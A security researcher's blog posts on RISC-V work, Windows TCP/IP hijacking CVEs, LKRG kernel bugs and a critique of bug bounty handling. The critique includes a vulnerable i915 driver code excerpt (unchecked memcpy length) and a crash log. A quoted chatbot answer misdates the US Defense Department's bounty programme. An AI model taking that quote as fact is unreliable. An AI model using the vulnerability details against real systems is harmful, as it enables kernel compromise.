pi3 blog

RISC-V: Vice Chair of the J-extension Task Group

pi3 — Tue, 14 Nov 2023 20:59:03 +0000

I am proud to share that I was elected the Vice Chair of the RISC-V J-extension (so-called J-ext) Task Group My last 3-4 years of work on the RISC-V architecture were quite fruitful:

I am an author of RISC-V Pointer Masking extension:
https://github.com/riscv/riscv-j-extension/blob/master/zjpm-spec.pdf
I am one of the Contributors to RISC-V Control Flow Integrity (CFI):
https://github.com/riscv/riscv-cfi/blob/main/riscv-cfi.pdf
I help driving I/D consistency extension
HWASAN and Memory Tagging (MTE) on RISC-V
I found a critical bug in the RISC-V architecture (not in the implementation of a specific processor) that got CVE-2021-1104. Among other things, I talked about this vulnerability in 2021 at the DefCon 29 conference

Thanks,
Adam

CVE-2023-34367

pi3 — Fri, 16 Jun 2023 20:25:10 +0000

Blind TCP/IP hijacking is still alive! After 13 years, Windows 7/XP/2K/9x (and not only) full blind TCP/IP hijacking bug finally got an allocated CVE-2023-34367 (thanks to MITRE). Interestingly, The Pwnie Awards nomination for this research and the published write-up + PoC didn’t help to get it sooner

More information about that bug I described in my blogpost on January 2021:
http://blog.pi3.com.pl/?p=850

More information about CVE is available on the MITRE website:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34367

Information on The Pwnie Awards nomination for this bug and research can be found here:
https://pwnies.com/windows-7-blind-tcp-ip-hijacking/

Port Swigger also covered that bug in their article here:
https://portswigger.net/daily-swig/blind-tcp-ip-hijacking-is-resurrected-for-windows-7

After 13 years we can finally use the CVE to identify this important (at least from my perspective) vulnerability!

Thanks,
Adam

Bug bounties are broken – the story of “i915” bug, ChromeOS + Intel bounty programs, and beyond

pi3 — Wed, 17 May 2023 15:16:55 +0000

At first, I didn’t plan to write an article about the problems with bug bounty programs. This was supposed to be a standard technical blogpost describing an interesting bug in the Linux Kernel i915 driver allowing for a linear Out-Of-Bound read and write access (CVE-2023-28410). Moreover, I’m not even into bug bounty programs, mostly because I don’t need to, since I consider myself lucky enough to have a satisfying, stable and well-paid job. That being said, in my spare time, apart from developing and maintaining the Linux Kernel Runtime Guard (LKRG) project, I still like doing vulnerability research and exploit development not only for my employer, and from time to time it’s good to update your resume with new CVE numbers. Before I started to have a stable income, bug bounties didn’t exist and most of the quality vulnerability research outcome was paying the bills via brokers (let’s leave aside the moral questions arising from this). However, nowadays we have bug bounty programs…

For the last decade (a bit longer), bug bounty programs gained a lot of deserved traction. There are security researchers who rely on bug bounties as their primary(!) source of income. Such cases are an irrefutable proof of the success of the bug bounty programs. However, before the industry ended up where it is now, it went through a long and interesting route.

A little bit of history:

On November 5, 1993, Scott Chasin created the bugtraq mailing list in response to the problems with CERT, where security researchers could publish vulnerabilities, regardless of vendor response, as part of the full disclosure movement of vulnerability disclosure. On July 9, 2002, Len Rose created Full Disclosure – a “lightly moderated” security mailing list because many people felt that the bugtraq mailing list had “changed for the worse”.
However, not everyone agreed with the “Full Disclosure” Philosophy and 2 major alternatives can be summarized as a Non-Disclosure and Coordinated Disclosure (also known as “Responsible Disclosure”). Non-Disclosure is generally favored by blackhat hackers and later by commercial exploit vendors (including brokers).

Coordinated (responsible) vulnerability disclosure is a policy under which researchers agree to report vulnerabilities to a coordinating authority, which then reports it to the vendor, tracks the fixes and mitigations, and coordinates the disclosure of information with stakeholders including the public. In some cases, the coordinating authority is the vendor.
However, some researchers started to raise concerns about how vendors handle the reported vulnerabilities (and treat the researchers as enemies) while others started to have expectations of compensation for their reports (bug bounty-like programs).

“No more free bugs”

In March 2009 at CanSecWest conference, Alex Sotirov, Dino Dai Zovi and Charlie Miller announced the “No More Free Bugs” campaign spreading the word that, in most cases, they would no longer be providing vendors with free vulnerability notices. Regardless of how effective it was (not really: https://twitter.com/0xcharlie/status/1480593646756024323), it certainly made industry news and opened a broader debate about the problem. It is worth mentioning that in the old days, when security researchers got a free t-shirt for their work, they could consider themselves lucky The real rewards came in fame and job offers from third parties (if at all).

The reason I’m mentioning all these “past problems” is because they are the basis of how and why we have bug bounty programs today in some form or other. Moreover, certainly we would NOT want to find the industry in a similar shape as in the old days.

Bug bounty programs – A new wonderful world!

Let’s ask ChatGPT the following question:

“What is the history of bug bounty programs?”

“Bug bounty programs have their origins in the early days of the internet, with companies such as Netscape and Mozilla offering rewards for the discovery and reporting of security vulnerabilities in their software. The concept of a “bug bounty” was formalized by the United States Department of Defense in the early 2000s with the launch of the Vulnerability Reward Program (VRP). Since then, many technology companies and organizations have implemented similar programs, offering rewards to security researchers for finding and reporting vulnerabilities in their systems. These programs have become an important tool in the fight against cybercrime, as they incentivize individuals to find and report vulnerabilities before they can be exploited by malicious actors.”

Pretty accurate While the market for vulnerabilities has developed, vulnerability commercialization (or “bug bounties”) remains an important tool allowing the developers to discover and resolve bugs before the general public becomes aware of them, preventing incidents of widespread abuse and data breaches.

However, some people might ask “Why do companies bother creating a bug bounty program?”. It’s a fair question, what’s the point (from the companies’ perspective) of paying money to “random” people for finding bugs in their products? Bug bounties benefit not only the researchers. In fact, if company’s security is mature enough and their products development is security oriented (which is usually not the case) they can actually bring a lot of benefits, including:

Cost-effective vulnerability management – bug bounties can be more cost-effective than hiring a third-party security firm to conduct penetration testing or vulnerability assessments, which can be expensive (especially for very complicated and mature products). Additionally, with a bug bounty program, companies can expand their testing and vulnerability research coverage, as they can have many security researchers with different levels of expertise, experience, and skills testing their products and systems. This can help the company to find vulnerabilities that might have been missed by their internal team.
Brand reputation – by having a bug bounty program, companies can show that they care about security and are willing to invest in it. It can also help to improve the company’s reputation in the security industry.
“Protect” the brand – by opening a bug bounty program, companies can encourage researchers to report vulnerabilities directly to them, rather than publicizing them or selling them to malicious actors. This can help to mitigate various security risks.
“Advertisement” to the potential customers – bug bounty are showing that they take security seriously and are actively working to identify and address vulnerabilities. Companies can build trust with their customers, partners, and other stakeholders.

Nevertheless, it should be noted that having a bug bounty program does not replace the need for secure SDLC, regular security testing and vulnerability management practices, and more. It’s an additional layer of security that can complement the existing security measures in place.

“Bug bounties are broken”

As we can see, bug bounties are very successful because both parties – researchers and companies – benefit from them. However, that being said, in recent years more and more security researchers started to loudly complain about some specific bounty programs. A few years ago, given the success of the bug bounties, such unfavorable opinions were marginal. Of course, they have always been there but certainly they were not as visible. Whenever a new company joined the revolution of opening a bug bounty, they were praised (especially by the media) for being mature and understanding the importance of security problems instead of pretending that security problems don’t affect them. However, has any media article really analyzed how such programs work in detail? Are there really no traps hidden for researchers in the conditions of the program?

Unfortunately, it seems as if every month social media (twitter?) discusses cases of, to put it mildly, controversial activities of some companies around their bug bounty programs. Is the golden age of bug bounty over? Perhaps little has changed other than more researchers starting to rely on the bug bounties as a primary (or significant) source of their income. Naturally, problems with the bug bounties would significantly affect their life and cause them to raise their concerns more broadly/boldly.

Bug bounties (as well as any type of vulnerability reporting program) always involved risk for the researchers. Some of the main reasons (again, thanks to ChatGPT! :)) include:

Insufficient rewards – some researchers may feel that the rewards offered by bug bounty programs are insufficient, either in terms of the monetary value or the recognition they receive. This can be especially true for researchers who discover high-severity vulnerabilities, which may be more difficult or time-consuming to find.

Slow or unresponsive communication – researchers may be frustrated by slow or unresponsive communication from bug bounty program coordinators, especially when it comes to triaging and addressing reported vulnerabilities.

Lack of transparency – researchers may feel that there is a lack of transparency in how bug bounty programs are run and how rewards are determined. They may also feel that there is a lack of communication about which vulnerabilities are being fixed and when.

Unclear scope – researchers may feel that the scope of the bug bounty program is not clearly defined, making it difficult for them to know which vulnerabilities are in scope and which are not.

Duplicate reports – researchers may feel frustrated when they report a vulnerability and then find out that it has already been reported by someone else. This can be especially frustrating if they are not rewarded for their work.

Rejecting a report – researchers may feel that their report is rejected without clear explanation, or that their report is not considered as a vulnerability.

No public recognition – some researchers may want to be publicly recognized for their work and not just rewarded with money.

As you can imagine, every single case from that list is happening to some extent. However, the fair question to ask is “what’s the main reason behind the possibilities of such problems?”.

“Imbalance of Power”

The fundamental problem with bug bounties is that they are not only created by the companies/vendors, but they are entirely and arbitrarily defined by them, and security researchers are at their mercy, without any recourse (because to whom can you appeal? to those who created, defined and decided what to do with the reported work?). We do have a problem with the power imbalance.
In the ideal world, we would have equitable terms that both parties can agree on, on what is to be expected under what circumstances before a security researcher even starts the work. Bug bounties are simply not structured this way.
Moreover, there’s a lot of false and misleading advertising, e.g., all of these articles showing the million dollar bug hunters, giving the impression that YOU too can become rich when you do bug bounties. A lot of young and motivated people, sometimes living in completely different countries than the company, have little options to fight for their rights when they are wronged. They might not know their legal rights, or don’t have the experience and capital to do that. However, some of the people in such situation try to fight by putting the pressure on the company using social media and we can see that from time-to-time e.g., on twitter.

Let’s look at some of the random examples of the problems with bug bounty programs that researchers had to deal with (you can find multiple ones):

1) “Rejecting a report”, “Slow or unresponsive communication”, “Unclear scope”, “Lack of transparency”, “No public recognition”, and after appeal “Insufficient rewards” from the researcher’s perspective:

“Windows 10 RCE: The exploit is in the link” (December 7th, 2021)

New blog post: Windows 10 RCE via an argument injection in the ms-officecmd URI handler.
While our RCE vector (MS Teams) has been fixed, the argument injection still persists.https://t.co/dDodI8QREi
— Positive Security (@positive_sec) December 7, 2021

Quote from the researchers’ blogpost:

"Microsoft Bug Bounty Program's (MSRC) response was poor: Initially, they misjudged and dismissed the issue entirely. After our appeal, the issue was classified as "Critical, RCE", but only 10% of the bounty advertised for its classification was awarded ($5k vs $50k). The patch they came up with after 5 months failed to properly address the underlying argument injection (which is currently also still present on Windows 11)"

In that specific case, researchers “hit” 6(!) out of 7 general potential problems with bug bounties (almost a jackpot! :)). It is very fascinating and educational to read the entire section on communication with Microsoft (highly recommended). What is worth to point out, is that:

"Someone at MS must agree with us, because the report earned us 180 Researcher Recognition Program points, a number which we could only explain as 60 base points with the 3X bonus multiplier for 'eligible attack scenarios' applied."

2) “Unclear scope” which resulted in “Insufficient rewards” from the researcher’s perspective

1) As long as it is a virtual machine escape vulnerability that is out of scope recognized by MSRC, it is not considered as a virtual machine escape vulnerability, even if this component is the default configuration on wsl2 and has the ability to escape from a virtual machine. https://t.co/C4Ksn3BCqU pic.twitter.com/yne3LB724k
— rthhh (@rthhh17) December 2, 2021

A researcher found a bug in the DirectX virtualization feature which allowed him to escape the VM boundary. However, DirectX is not a part of Hyper-V itself but a separate feature which can be used by Hyper-V to provide certain functionality. DirectX is off by default unless certain features opt to turn it on. However, the researcher argued that this specific feature is on by default on WSL2 as well as some cloud providers which provide DirectX virtualization (for some scenarios).

That’s an interesting case from the scoping perspective because at the end of the day, the researcher developed a PoC and proved it could escape the VM boundary. Regardless of whether the problem is in core a Hyper-V component or not, such bugs are valuable in the black market and one of the brokers suggested to contact them next time instead of the bug bounty program:

It's unfortunate, if it helps, next time contract me of you are interested to sell it to a third party and get paid for your efforts
— Maor Shwartz (@malltos92) November 9, 2021

3) “Unclear scope” and “Rejecting a report”

I just published How I find Microsoft sever RCE issues they fixed but didn’t pay any bounty https://t.co/aR2kESaaFy @msftsecresponse
@microsoft

#bugbountytips #BugBounty
— Dateking (@tx20011613) January 12, 2023

https://medium.com/@wlymoyi/how-i-find-microsoft-sever-rce-issues-they-fixed-but-didnt-pay-any-bounty-43a66e1aa002

A researcher found a few instances of Microsoft Exchange servers whose IP/Domains belong to Microsoft and they were vulnerable to the ProxyShell attack. ProxyShell is an attack chain that exploits three known vulnerabilities in Microsoft Exchange: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. By exploiting these vulnerabilities, attackers can perform remote code execution.

The researcher reported these issues to MSRC and after about 1 month Microsoft fixed all the issues and sent the researcher negative messages, claiming that all the issues are: Out of scope, and/or have only a moderate severity. The researcher argued that by combining all these issues you would get RCE in the end and RCE is certainly not a moderate issue (especially that Microsoft fixed the reported problems).

4) “Duplicate reports” and “Slow or unresponsive communication”

https://twitter.com/matrosov/status/1615815047653265410

A researcher submitted multiple high-impact vulnerabilities and months later the vendor rejected all the bugs arguing that they had known about them because they had discovered exactly the same bugs internally prior to the submission. However, at the same time the vendor didn’t and couldn’t provide any evidence (no CVEs) that they really found them by themselves (internally). Moreover, the vendor took a long time to respond which raises questions (and undermines credibility) about the internal findings.

5) “Insufficient rewards”

Decided to publish the Lexmark printer exploit + writeup + tools instead of sell it for peanuts. 0day at the time of writing: https://t.co/YptEXw3CjJ — enjoy!
— blasty (@bl4sty) January 10, 2023

“Researcher drops Lexmark RCE zero-day rather than sell vuln “for peanuts””
https://portswigger.net/daily-swig/researcher-drops-lexmark-rce-zero-day-rather-than-sell-vuln-for-peanuts

Quote from the article:

According to the researcher, Lexmark was not notified before the zero-day's release for two reasons.
First, Geissler wished to highlight how the Pwn2Own contest is "broken" in some regards, as shown when low monetary rewards are offered for "something with a potentially big impact" such as an exploit chain that can compromise over 100 printer models.
Furthermore, he said that official disclosure processes are often long-winded and arduous.
"In my experience, patching efforts by the vendor are greatly accelerated by publishing turnkey solutions in the public domain without any heads up whatsoever," Geissler noted.
"Lexmark might reconsider partnering with similar competitions in the future and opt to launch their own vulnerability bounty/reward program."

“Linux Kernel i915 Linear Out-Of-Bound read and write access”

So, what’s the story of i915 driver vulnerability from the title of this article? Sometimes, when I really need a break from my day-to-day work and I’m burnt out working on LKRG, but at the same time I still want to do vulnerability research (I’m rarely in such state), I’m either reading (for fun) the source code of OpenSSH (which resulted in e.g., CVE-2019-16905 or CVE-2011-5000) or the Linux kernel:
https://sourcegraph.com/search?q=context:global+repo:%5Egithub%5C.com/torvalds/linux%24+type:commit+zabrocki&patternType=standard&sm=1&groupBy=path
https://github.com/torvalds/linux/search?q=zabrocki&type=commits

In November 2021 during analysis of i915 driver I found a linear Out-Of-Bound (OOB) read and write access causing a memory corruption and/or memory leak bug. The vulnerability exists in the ‘vm_access‘ function, typically used for debugging the processes. This function is needed only for VM_IO | VM_PFNMAP VMAs:

static int
vm_access(struct vm_area_struct *area, unsigned long addr,
void *buf, int len, int write)
{
…
if (write) {
[1] memcpy(vaddr + addr, buf, len);
__i915_gem_object_flush_map(obj, addr, len);
} else {
[2] memcpy(buf, vaddr + addr, len);
}
…
}

Parameter ‘len‘ is never verified and it is directly used as an argument for the memcpy() function. At line [1], the memcpy() function writes the user controlled data to the “pinned” page causing a potential memory corruption / overflow vulnerability. At line [2], the memcpy() function reads the memory (data) from the “pinned” page to the area visible to the user causing a potential memory leak problem.
The full and detailed description of the bug with all the analysis (and PoC) can be found here:
http://site.pi3.com.pl/adv/CVE-2023-28410_i915.txt

I’ve identified 3 different interfaces which could be used to trigger the bug and I shared my finding with my friend Jared (https://twitter.com/jsc29a) and we started working on PoC. We quickly developed a very reliable PoC crashing the kernel:

[ 2706.589001] BUG: unable to handle page fault for address: ffffb23ac04fa000
[ 2706.589011] #PF: supervisor read access in kernel mode
[ 2706.589016] #PF: error_code(0x0000) - not-present page
…
[ 2706.589140] Call Trace:
[ 2706.589264] ? vm_access+0x75/0xc0 [i915]

At that point I usually decide to develop a fully weaponized exploit, or to contact the vendor ASAP to report and fix the issue. However, just by my curiosity I wanted to know where Intel’s GPU (with i915 driver) is enabled (by default) and I realized that it is used in multiple interesting places, including:

Google Chromebook / Chromium
Most of the business laptops
Power-efficient laptops
Any device using Intel CPU with integrated GPUs

but hold on… doesn’t point “a.” (Chromebook) have a bug bounty program? Maybe it’s a good time to try bug bounties myself? How does it even work? Everyone praises Google and their Security, right?

So, let’s see what’s going on here:
https://bughunters.google.com/about/rules/5745167867576320/chrome-vulnerability-reward-program-rules

“…
In addition to the Chrome bug classes recognized by the program, we are interested in reports that demonstrate vulnerabilities in Chrome OS’ hardware, firmware, and OS components.
…
Sandbox escapes
Additional components are in scope for sandbox escapes reports on Chrome OS. These include:
…
Obtaining code execution in kernel context.
…”

OK, looks like it should be in scope of their bug bounty. Let’s try that path and see how it goes I didn’t have much time to spend on this bug anymore, but I slightly modified the PoC to leak something (not just crashing the kernel). It was relatively easy, so I opened the bug and waited to see where it goes:
https://bugs.chromium.org/p/chromium/issues/detail?id=1293640

Then on Saturday (Feb 5th, 2022) I had some extra free time and decided to see how easy it would be to weaponize the PoC, and I realized something not so great
When I developed my PoC leaking something interesting, I did it on my debugging machine with a special configuration including KASAN and all of that. To my surprise, when I re-run my PoC on a “fresh and clean” VM, I was constantly crashing the kernel and did not leak anything. Well… that started bothering me so I spent some time analyzing what was going on. After heavy work and technical discussion with spender (kudos to grsecurity) I realized that when you enable PFN remapping (for debugging some of my peripheral) with KASAN, VM_NO_GUARD flag is set. When KASAN is NOT enabled, unfortunately, vmap() and vmap_pfn() place GUARD page on the top of the mapping in exactly the same way as vmalloc() adds a GUARD page on the top of each allocation Because of that, my PoC was working very well on my debugging kernel but not on a “fresh” VM. Well… I thought I should update the bug which I opened to be fair and transparent, and I shared all the information (including updating the technical details in advisory and adding snipped relevant kernel code):
https://bugs.chromium.org/p/chromium/issues/detail?id=1293640#c3

At that point I kind of expected that Chromebook configuration doesn’t enable KASAN on production (why would they? :)) so even though the bug is great by itself, it will only allow to crash the kernel (no code-exec, unless KASAN is enabled ;-)). However, the bug should be fixed anyway (even if it is kernel DoS) and because of non-standard configurations (with VM_NO_GUARD flag) it is exploitable. Google summarized the bug (based on what I shared) as:

“Thanks for the detailed report! Has this also been reported against upstream Linux and/or to the driver maintainers?

Here is a summary according to my understanding:

i915 GPU buffers can be accessed via vm_remote_access (intended for debugging buffers no residing in the userspace process’ address space)

The function that performs the memory access is lacking a length check, allowing userspace to attempt OOB read/writes past the buffer end

The standard kernel configuration has guard pages in place, which causes an access violation in the kernel, not an actual OOB access

Assuming the above is correct, this is a denial of service situation (since we reliably crash accessing the guard page), thus Severity-Low. We still want this fixed, but waiting for upstream to fix and then consuming the fix via stable branches is sufficient.”

Additionally, they confirmed that PoC crashes all the kernels. I didn’t really agree with the statement “(…) causes an access violation in the kernel, not an actual OOB access” because it is the other way around. It IS actual OOB access and because of that it causes access violation. However, I decided not to be picky and I ignored it. I confirmed their statement, Google assigned the severity “low” to it and informed me that they would forward all the information to Intel PSIRT… Sure Now the “fun” part starts…

I reported the issue to Google on February 3rd, 2022
Google reported the issue to Intel on February 8th, 2022
Google went silent for 58 days
On 7th of April 2022, I asked if there were any updates
Silence for another 5-6 days

On April 12th, 2022 I was doing some LKRG development for the latest vanilla kernel and during git sync I realized that i915 kernel file where I found the bug was updated. Hm… It is “suspicious” to start seeing such “random” updates on that file while not getting any updates from Google for almost 2 months Let’s see what’s going on… and what I found completely shocked me

I found the following commit fixing the reported issue on 11th of March 2022 (29 days before my latest ask to Google with updates):
https://github.com/torvalds/linux/commit/661412e301e2ca86799aa4f400d1cf0bd38c57c6
In the commit message, they used wrong email address:
“Suggested-by: Adam Zabrocki adamza@microsoft.com“
I have not worked for Microsoft since 2019 and I reported this issue from a different email address (gmail.com not microsoft.com).
Additionally, I’ve found the following discussion:
https://patchwork.kernel.org/project/intel-gfx/patch/20220303060428.1668844-1-mastanx.katragadda@intel.com/
Started on March 3rd, 2022.
The commit suggested that the bug was found internally by Intel folks, not by me (aha…):
Signed-off-by: Mastan Katragadda mastanx.katragadda@intel.com
Suggested-by: Adam Zabrocki adamza@microsoft.com
Reported-by: Jackson Cody cody.jackson@intel.com
Cc: Chris Wilson chris@chris-wilson.co.uk
Cc: Jon Bloomfield jon.bloomfield@intel.com
Cc: Sudeep Dutt sudeep.dutt@intel.com
Cc: stable@vger.kernel.org # v5.8+

The definition of “Reported-by” tag from the kernel.org: “The Reported-by tag gives credit to people who find bugs and report them and it hopefully inspires them to help us again in the future.”
Explanation of all the fields can be found here:
https://www.kernel.org/doc/html/v6.3/process/submitting-patches.html#using-reported-by-tested-by-reviewed-by-suggested-by-and-fixes

In summary, Google stayed silent for 58 days, they didn’t reply to my messages and in the meantime Intel fixed the bug more than a month prior, suggesting they found the bug themselves. However, as a consolation prize they put me as an author of the patch, using my old Microsoft address (while I haven’t worked for Microsoft since 2019 as I mentioned before). So far, bug bounty programs are doing great!

It looks like I hit the following problems so far:

“Slow or unresponsive communication” – in fact, I would elevate it to no communication at all
“Lack of transparency” – how bug ended-up being fixed and no one gave any updates for almost 2 months
“No public recognition” – the fixes suggest that the bug was found internally by Intel

I wrote about all my findings to Google, after which they finally replied saying that they didn’t contact Intel nor did Intel contact them. Google has taken responsibility to be the coordinator of handling the bug reporting/fixing process but didn’t follow-up on what was going on for 2 months.

On the top of the listed potential problems with Bug Bounty programs, a “middle-man” like Google might deserve their own list of unique problems. However, at the same time, the described problems can fall into the bracket of “Slow or unresponsive communication” and “Lack of transparency”.

Going back to the main story, Google added me to the mailthread and went silent again. In the meantime, I started talking with Intel directly, and on April 12th they promised to come back to me until EOW after finding out what was going on. I reminded them on April 14th about it and they still were silent. Then I poked them again on the 18th because of course I didn’t hear back from them at the end of the week (“Slow or unresponsive communication” and “Lack of transparency”). Then I got a reply which was kind of… weird?

“I appreciate your patience with this. The issue has received a positive triage and was reproducible. We are currently working with the product team to settle on a severity score and a push to mitigation.(…)”

This reply didn’t make sense because during the time of the conversation, Intel already created a patch for this issue (on March 3, 2022, 6:04 a.m.) and merged it to the official Linux kernel on March 14th, 2022. In short, the bug was already fixed, pushed to the Linux git repo making it essentially public for the last 40+ days. Despite this, no CVE had been assigned and the security bulletin has not been published. However, Intel was claiming that they were still triaging the issue…

I also didn’t get why I had to start resolving the issues which I didn’t create. This bug was officially reported to Google, and I would expect that Google’s responsibility is to handle the communication and fixes correctly. I asked Google about that and the reply which I got was a long corporation statement which in short was saying something around “It’s Intel’s problem, not ours. We are OK, the severity is low so what’s your problem?”
https://bugs.chromium.org/p/chromium/issues/detail?id=1293640#c22

Well… I do understand and I’m fully aligned and agree that it is the responsibility of the component’s owner (Intel in this case) to handle any fixes. Although, I would question if such kind of communication is an industry standard as there’s been no follow-up with the researcher (February – April) as well as no follow-up with the vendor throughout.
When I asked for updates, I received no reply until I discovered by myself that the bug had been already fixed in a shady way for at least a month.

In short, Google’s reply can be summarized as “It’s Intel’s problem and now they are doing OK, they are not shady”:
https://bugs.chromium.org/p/chromium/issues/detail?id=1293640#c22

Google’s approach might fall into something equivalent as “Unclear scope” brackets of problems but unique for a “middle-man”. It is an actual Google’s responsibility as a coordinator for handling the bugs reported to them.

Additionally, I got a pretty interesting statement:

“We are all humans running and crewing security programs trying to triage our own discoveries as well as those from external reporters and trying to run decent VDP programs. All the folks I work with in Chrome/Chrome OS greatly appreciate the contributions of the external researchers – such as yourself- are trying their best to get bugs fixed and want to do the right thing. There are smart people and solid processes to stay on top of all this, but at the end of the day mistakes are going to happen – bugs may get mistriaged, reports may get merged in the wrong direction giving someone else the acknowledgement for a finding, someone may not always respond in a timely manner. But 100% of the time, if you reach out, one of us will respond, hear you out and work with you to make things as right as possible.
From what I can see in the comments above and in the email thread, each time you reached out to mnissler@, he responded fairly quickly. He could only do so much to get you the information you wanted because we are on the outside of that process. He did go and attempt to coordinate with Intel as best as possible and to eliminate the need for the middle-person to run comms, added you on the email thread so you could directly coordinate with the vendor/Intel.”

Behind all these sweet words, what is really written is “well, shit happens, deal with it, not our problem”. Moreover, there is lack of any explanation of what really happened here (serious “Lack of transparency”).
In fact, there is nothing in what she wrote that I would disagree with, excluding “always respond in a timely manner” (please look at the dates at comment 14, 15, 16 and 17). Almost 2 months of no reply and follow-up, that’s certainly not a “timely manner response” (“Slow or unresponsive communication”).
What is the most crazy is that from Google’s perspective everything was done as it should be, including communication. I’m surprised by it, and I would respectfully disagree with that.
If during this time (February – April 2022) anyone had followed-up with the vendor and sent even a single email asking for the updates, this mess could have been avoided.

How has it ended?

Intel continued “triaging the bug” until October 2022 (!). They kept postponing the release date from October to November, then to February 2023… and then to May 2023 (remember that bug was reported in February 2022, silently fixed as an internal finding on March 2022, and was originally found by me in November 2021 :)).

Bulletin:
INTEL-SA-00886 / CVE-2023-28410:

Lesson learned

My experience with bug bounties was much worse than I expected. Especially Google’s attitude of being silent forever until things went horribly/obviously wrong. Then, they tried to put the responsibility for everything on Intel and convince me that it was not their problem even though the bug was reported to them, and that they were handling the communication very well(!). As a researcher, what can you do? Nothing.
Intel screwed up badly, but they tried best to fix what they messed-up (and what was still possible to fix at that point). Contrary to Google’s attitude, Intel didn’t blame anyone, and they didn’t try to convince me that they were doing their best and they were not dismissive.

It is worth mentioning that Intel officially apologized for how this case was handled: “(…) We would like to apologize for the way this case has been handled. We understand the back and forth with us has been frustrating and a long process. (…)“. However, nothing like that happened on Google’s part.

If this bug was really valuable from the exploitability perspective, it looks like still the best option is to dust off the old broker contacts (if we leave the moral questions aside). They never ever failed so much (at least that’s my experience), even though they are not ideal as well.

Btw. To be fair, there are also positive examples of bug bounty programs, like this one:
https://twitter.com/ergot86/status/1618977435898494976

Closing words

The decision of whether or not to write this article has matured in me for quite a long time for many different reasons. However, when I came to the conclusion that it is worth describing the generally unspoken problems associated with bug bounty programs (including my specific case), the following people contributed to its final form (random order):

Jared Candelaria (https://twitter.com/jsc29a)
Ilja van Sprundel (https://twitter.com/ivansprundel)
Axel “0vercl0k” Souchet (https://twitter.com/0vercl0k)
Michał “redford” Kowalczyk (https://twitter.com/dsredford)
Gynvael Coldwind (https://twitter.com/gynvael)
Alex Matrosov (https://twitter.com/matrosov)
Michael Larabel (https://twitter.com/michaellarabel)

I hope that we as a security community can start some conversation on how the described unspoken problems of bug bounties can be addressed. “Imbalance of Power” is a real problem for the researchers and it should be changed.

Thanks,
Adam

My talks @ BlackHat 2021 and DefCon29

pi3 — Sat, 03 Jul 2021 20:59:36 +0000

This year I’m going to present some amazing research on:

BlackHat 2021 – “Safeguarding UEFI Ecosystem: Firmware Supply Chain is Hard(coded)” – together with Alex Tereshkin and Alex Matrosov
Abstract: click here
DefCon 29 – “Glitching RISC-V chips: MTVEC corruption for hardening ISA” – together with Alex Matrosov
Abstract: click here

Both of them are really unusual and interesting topics

If anyone is going to be in Las Vegas during BlackHat and/or DefCon this year and would like to grab a beer, just let me know!

Thanks,
Adam

LKRG 0.9.0 has been released!

pi3 — Mon, 12 Apr 2021 21:54:43 +0000

During LKRG development and testing I’ve found 7 Linux kernel bugs, 4 of them have CVE numbers (however, 1 CVE number covers 2 bugs):

CVE-2021-3411  - Linux kernel: broken KRETPROBES and OPTIMIZER
CVE-2020-27825 - Linux kernel: Use-After-Free in the ftrace ring buffer
                 resizing logic due to a race condition
CVE-2020-25220 - Linux kernel Use-After-Free in backported patch for
                 CVE-2020-14356 (affected kernels: 4.9.x before 4.9.233,
                 4.14.x before 4.14.194, and 4.19.x before 4.19.140)
CVE-2020-14356 - Linux kernel Use-After-Free in cgroup BPF component
                 (affected kernels: since 4.5+ up to 5.7.10)

I’ve also found 2 other issues related to the ftrace UAF bug (CVE-2020-27825):

Deadlock issue which was not really addressed and devs said they will take a look and there is not much updates on that.
Problem with the code related to hwlatd kernel thread – it is incorrectly synchronizing with launcher / killer of it. You can have WARN in kernels all the time.

CVE-2021-3411 refers to 2 different type of bugs:

Broken KRETPROBE (recently reported)
Incompatibility of KPROBE optimizer with the latest changes in the linker.

Additionally, I’ve also found a bug with the kernel signal handling in dying process:

CVE-2020-12826 – Linux kernel prior to 5.6.5 does not sufficiently restrict exit signals

However, I don’t remember if I found it during my work related to LKRG so I’m not counting it here (otherwise it would be total 8 bugs while 5 of them would have CVE).

That’s pretty bad stats… However, it might be an interesting story to say during LKRG announcement of the new version. It could be also interesting talk for conference.

Full announcement can be read here:
https://www.openwall.com/lists/announce/2021/04/12/1

Best regards,
Adam

Windows 7 TCP/IP hijacking

pi3 — Sun, 24 Jan 2021 18:18:34 +0000

Blind TCP/IP hijacking is still alive on Windows 7… and not only. This version of Windows is certainly one of the “juiciest” targets even though January 14th 2020 was the official EOL (End Of Life) for it. Based on various data Windows 7 holds around 25% share of the Operating Systems (OS) market and is still the world’s second most popular desktop operating system.

A little bit of history

It was a few months before I joined Microsoft as a Security Software Engineer in 2012 when I sent them a report with an interesting bug/vulnerability in all versions of Microsoft Windows including Windows 7 (the latest version at that time). It was an issue in the implementation of TCP/IP stack allowing attackers to carry out a blind TCP/IP hijacking attack. During my discussion with MSRC (Microsoft Security Response Center) they acknowledged the bug exists, but they had their doubts about the impact of the issue claiming “it is very difficult and very unreliable” to exploit. Therefore, they were not going to address it in the current OSes. However, they would fix it in the upcoming OS which was going to be released soon (Windows 8).

I didn’t agree with MSRC’s evaluation. In 2008 I developed a fully working PoC which would automatically find all the necessary primitives (client’s port, SQN and ACK) to perform blind TCP/IP hijacking attack. This tool was exploiting exactly the same weaknesses in TCP/IP stack which I’ve reported. That being said, Microsoft informed me that if I share my tool (I didn’t want to do it), they would reconsider their decision. However, for now, no CVE would be allocated, and this problem was supposed to be addresses in Windows 8.

In the next months I started my work as FTE (Full Time Employee) for Microsoft, and I verified that this problem was fixed in Windows 8. Over the course of years, I completely forgot about it. Nevertheless, when I left Microsoft, I was doing some cleanups on my old laptop and found my old tool. I copied it from the laptop and decided to re-visit it once I will have a bit more time. I found some time and thought that my tool deserves a release and a proper description.

What is TCP/IP hijacking?

Most likely majority of the readers are aware what this is. For those who don’t, I encourage you to read many great articles about it which you can find on the internet these days.

It might be worth to mention that probably the most famous blind TCP/IP hijacking attack was done by Kevin Mitnick against the computers of Tsutomu Shimomura at the San Diego Supercomputer Center on Christmas Day, 1994.

This is a VERY old-school technique which nobody expects to be alive in 2021… Yet, it’s still possible to perform TCP/IP session hijacking today without attacking the PRNG responsible for generating the initials TCP sequence numbers (ISN).

What is the impact of TCP/IP hijacking nowadays?

(Un)fortunately it is not as catastrophic as it used to be. The main reason is that majority of the modern protocols do implement encryption. Sure, it’s overwhelmingly bad if attacker can hijack any TCP/IP session which is established. However, if the upper-layer protocols properly implement encryption, attackers are limited in terms of what they can do with it. Unless they have ability to correctly generate encrypted messages.

